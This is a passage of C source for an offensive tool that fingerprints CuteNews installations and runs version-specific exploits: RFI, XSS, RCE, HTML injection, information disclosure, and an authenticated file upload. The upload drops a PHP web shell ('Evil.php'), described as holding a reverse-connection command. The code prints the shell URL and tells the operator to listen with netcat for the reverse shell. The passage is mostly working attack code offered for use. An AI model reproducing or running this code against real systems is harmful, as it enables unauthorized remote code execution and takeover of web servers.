log_to_file("\e[0;36m[+] A file was created that will be branched in the server (Evil.php) and a reverse connection command was placed in it...\n");
log_to_file("\e[0;36m[+] Don't forget to listen to the port using netcat command for example (nc -lvnp 444)\n");
if (!curl)
{
fprintf(stderr, "\e[0;31m[-] Failed to initialize curl\n");
log_to_file("\e[0;31m[-] Failed to initialize curl\n");
return;
}
snprintf(full,
sizeof(full),
"%s/cutenews/index.php?mod=main&opt=login",
url_login);
snprintf(login_data,
sizeof(login_data),
"username=%s&password=%s",
username,
password);
snprintf(url_upload,
sizeof(url_upload),
"%s/cutenews/index.php?mod=main&opt=person",
url_login);
snprintf(login_data,
sizeof(login_data),
"username=%s&password=%s",
username,
password);
curl_easy_setopt(curl,
CURLOPT_URL,
url_login);
curl_easy_setopt(curl,
CURLOPT_POSTFIELDS,
login_data);
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
curl_easy_setopt(curl,
CURLOPT_COOKIEJAR,
cookieFile);
res = curl_easy_perform(curl);
if (res != CURLE_OK)
{
fprintf(stderr,
"\e[0;31m[-] Login failed: %s\n",
curl_easy_strerror(res));
curl_easy_cleanup(curl);
return;
}
printf("\e[0;36m[+] Logging in...\n");
printf("\e[0;36m[+] FULL Login URL : %s\n", full);
printf("\e[0;36m[+] Logged in successfully!\n");
log_to_file("\e[0;36m[+] Logging in...\n");
log_to_file("\e[0;36m[+] FULL Login URL : \n");
log_to_file(full);
log_to_file("\e[0;36m[+] Logged in successfully!\n");
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpCode);
printf("\e[0;32m=> HTTP CODE : %ld\n", httpCode);
printf("\e[0;34m[+] User : %s\n",
username);
log_to_file("\e[0;34m[+] User : test");
printf("\e[0;34m[+] Password : %s\n",
password);
log_to_file("Password : 837201\n");
curl_mime *mime = curl_mime_init(curl);
curl_mimepart *part = curl_mime_addpart(mime);
curl_mime_name(part,
"avatar_file");
curl_mime_filedata(part,
filename);
curl_mime_filename(part,
"Evil.php");
curl_easy_setopt(curl,
CURLOPT_URL,
url_upload);
curl_easy_setopt(curl,
CURLOPT_MIMEPOST,
mime);
curl_easy_setopt(curl,
CURLOPT_COOKIEFILE,
cookieFile);
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
res = curl_easy_perform(curl);
if (res != CURLE_OK)
{
fprintf(stderr,
"\e[0;31m[-] File upload failed: %s\n",
curl_easy_strerror(res));
log_to_file("\e[0;31m[-] File upload failed\n");
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpCode);
printf("\e[0;32m=> HTTP CODE : %ld\n",
httpCode);
}
else
{
printf("\e[0;36m[+] File uploaded successfully!\n");
log_to_file("\e[0;36m[+] File uploaded successfully!\n");
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpCode);
printf("\e[0;32m=> HTTP CODE : %ld\n",
httpCode);
printf("\e[0;33m[+] Your Shell URL : %s%s\n",
url_login,
up);
log_to_file("\e[0;33m[+] Your Shell URL : \n");
log_to_file(url_login);
}
curl_mime_free(mime);
curl_easy_cleanup(curl);
}
int main(int argc, const char *argv)
{
printf(
"⠀\e[0;34m\n"
" __ __ _____ _ \n"
" \\ \\ / / / ____| | | \n"
" \\ V / ___ _ __ ___ | | _ _| |_ ___ \n"
" > < / _ \\ '_ \\ / _ \\| | | | | | __/ _ \\\n"
" / . \\ __/ | | | (_) | |___| |_| | || __/\n"
" /_/ \\_\\___|_| |_|\\___/ \\_____|\\__,_|\\__\\___|\n"
" \e[1;37m@Byte Reaper \n"
"\n"
);
printf("\e[4;34m==> USE AT YOUR OWN RISK.\n");
log_to_file("\e[4;34m==> USE AT YOUR OWN RISK.\n");
printf("\e[0;35m------------------------------------------------------------------------------------\n");
log_to_file("\e[0;35m------------------------------------------------------------------------------------\n");
const char* message = "\e[1;32m[+] Good luck on Exploit \n";
print_slow(message);
printf("\e[0;35m------------------------------------------------------------------------------------\n");
log_to_file("\e[0;35m------------------------------------------------------------------------------------\n");
printf("\n[+] Create File log (exploit.log)\n");
info();
const char *urlArg = NULL;
const char *payload = NULL;
const char *ip = NULL;
int port = 0;
int file_Scanne;
struct argparse_option options[] =
{
OPT_HELP(),
OPT_STRING('u',
"url",
&urlArg,
"Enter Target Url (Ex : http://exemple.com)"),
OPT_STRING('p',
"payload",
&payload,
"Enter Payload For Exploit RFI"),
OPT_STRING('i',
"ip",
&ip,
"Enter Your IP For Exploit Remote File Upload, Exemple Command get ip (ip addr OR ifconfig)"),
OPT_BOOLEAN('s',
"port",
&port,
"Enter your port For Get reverse Shell , exemple (-s 4444)"),
OPT_END(),
};
struct argparse argparse;
argparse_init(&argparse,
options,
NULL,
0);
argparse_parse(&argparse,
argc,
(const char **)argv);
if (!urlArg)
{
printf("\e[0;31m[-] PLEASE ENTER TARGET URL !\n");
log_to_file("\e[0;31m[-] PLEASE ENTER TARGET URL !\n");
printf("\e[0;33m[-] USAGE : %s -u <URL>\n",
argv[0]);
exit(1);
}
printf("\n\e[0;33m[+] The version is being determined. Please wait...\n");
log_to_file("\n\e[0;33m[+] The version is being determined. Please wait...\n");
char *version = find_version(urlArg);
if (!version)
{
printf("\e[0;31m[-] Unable to detect CuteNews version.\n");
log_to_file("\e[0;31m[-] Unable to detect CuteNews version.\n");
return 1;
}
printf("\e[0;36m[+] Detected CuteNews version: %s\n", version);
if (urlArg != NULL)
{
printf("\e[0;36m[+] Target Url Is : (%s)\n", urlArg);
if (strcmp(version, "0.88") == 0)
{
printf("\e[0;33m[+] Running RFI exploit for version 0.88...\n");
log_to_file("\e[0;33m[+] Running RFI exploit for version 0.88...\n");
exploit_RFI_0_88(urlArg, payload);
printf("\e[0;33m[+] Running XSS exploit for version 0.88...\n");
log_to_file("\e[0;33m[+] Running XSS exploit for version 0.88...\n");
exploit_XSS_0_88(urlArg);
}
if (strcmp(version, "1.1.1") == 0)
{
printf("\e[0;33m[+] Running RCE exploit for version 1.1.1 ...\n");
log_to_file("\e[0;33m[+] Running RCE exploit for version 1.1.1 ...\n");
exploit_RCE_1_1_1(urlArg);
}
if (strcmp(version, "1.3") == 0)
{
printf("\e[0;33m[+] Running Html Injection exploit for version 1.3 ...\n");
log_to_file("\e[0;33m[+] Running Html Injection exploit for version 1.3 ...\n");
exploit_html_injection1_3(urlArg);
printf("\e[0;33m[+] Running Info Disclosure exploit for version 1.3 ...\n");
log_to_file("\e[0;33m[+] Running Info Disclosure exploit for version 1.3 ...\n");
exploit_info_disclosure1_3(urlArg);
}
if (strcmp(version, "1.3.1") == 0)
{
printf("\e[0;33m[+] Running XSS exploit for version 1.3.1 ..\n");
log_to_file("\e[0;33m[+] Running XSS exploit for version 1.3.1 ..\n");
xss1_3_1(urlArg);
}
if (strcmp(version, "2.0.3") == 0)
{
printf("\e[0;33m[+] Remote File Upload exploit for version 2.0.3 ...\n");
log_to_file("\e[0;33m[+] Remote File Upload exploit for version 2.0.3 ...\n");
if (!ip)
{
printf("\e[0;31m[-] Please Enter Your ip !!\n");
log_to_file("\e[0;31m[-] Please Enter Your ip !!\n");
}
if (!port)
{
printf("\e[0;31m[-] Please Enter your Listen Port!\n");
log_to_file("\e[0;31m[-] Please Enter your Listen Port!\n");
}
else
{
remote_file_upload(urlArg, ip, port);
}
}
else
{
printf("\e[0;31m[-] this Version Not Exploit : %s\n", version);
log_to_file("\e[0;31m[-] this Version Not Exploit !!\n");
}
}
return 0;
}